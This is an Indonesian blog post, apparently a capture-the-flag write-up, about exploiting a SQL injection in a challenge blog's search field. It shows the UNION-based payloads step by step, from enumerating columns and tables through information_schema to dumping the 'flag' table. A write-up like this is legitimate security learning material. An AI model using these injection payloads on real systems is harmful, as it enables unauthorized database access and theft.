disoal bajigur blog ini terdapat celah pada input pencarian, ketika saya mengetik ' dan mensubmitnya terdapat errror msyql jadi saya menggunakan teknik UNION, ok saya langsung saja
pertama saya mencari jumlah kolum dengan Query " ' UNION SELECT 1,2,3,4-- ", ternyata ada 4 kolumn tapi column yang muncul hanya 2,3,4 itu karena column 1 kemungkinan idnya.
selanjutnya mencari list table yang terdapat pada database dengan menggunakan Query " ' OR 1 UNION SELECT 1,2,3,GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database()-- " saya menemukan dua table.
setelah saya mendapatkan list selanjutnya saya akan mencari list dari kolum tabel tersebut, saya akan medump table flag karena saya yakin flagnya terdapat disana, Query " ' OR 1 UNION SELECT 1,2,3,group_concat(column_name) FROM information_schema.columns WHERE table_name = 'flag'-- " wow ferguso saya sudah menemukan columnnya yaitu id, content.
tanpa basa basi kita dump saja isi dari column tersebut dengan Query: " ' OR 1 UNION SELECT 1,2,id,content FROM flag-- " dan flag saya dapatkan
No comments:
Post a Comment